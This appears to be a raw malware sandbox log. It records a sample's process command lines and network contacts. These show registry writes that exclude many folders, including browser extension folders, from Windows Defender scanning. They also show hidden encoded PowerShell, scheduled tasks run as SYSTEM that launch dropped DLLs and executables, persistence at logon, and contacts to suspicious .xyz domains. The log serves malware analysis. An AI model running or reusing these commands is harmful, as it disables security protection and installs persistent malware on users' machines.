powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gMLAyRIKf" /SC once /ST 01:31:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gMLAyRIKf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gMLAyRIKf"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 00:10:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe\" Ci /Adsite_idbTs 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MWViHNuTpmRlpInKg"

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe Ci /Adsite_idbTs 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\kLLbZH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\DEqklWO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\BaSMZgS.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\axofhyl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\XvHXZAA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\GlGomVo.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 04:42:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\iwylrPXt\QdcQzQC.dll\",#1 /fgsite_idvFn 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BinjFlxHFUMMGNOij"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\iwylrPXt\QdcQzQC.dll",#1 /fgsite_idvFn 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\iwylrPXt\QdcQzQC.dll",#1 /fgsite_idvFn 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"

Network

Country  Destination           Domain                          Proto
N/A      224.0.0.251:5353      N/A                             udp
US       8.8.8.8:53            service-domain.xyz              udp
US       3.80.150.121:443      service-domain.xyz              tcp
US       8.8.8.8:53            96.136.73.23.in-addr.arpa       udp
US       8.8.8.8:53            40.13.222.173.in-addr.arpa      udp
US       8.8.8.8:53            201.179.17.96.in-addr.arpa      udp
DE       216.58.206.46:443     clients2.google.com             tcp
DE       142.250.186.65:443    clients2.googleusercontent.com  tcp
DE       216.58.206.46:443     clients2.google.com             tcp
US       44.240.147.44:80      api4.check-data.xyz             tcp
US       52.111.227.11:443     N/A                             tcp

Files
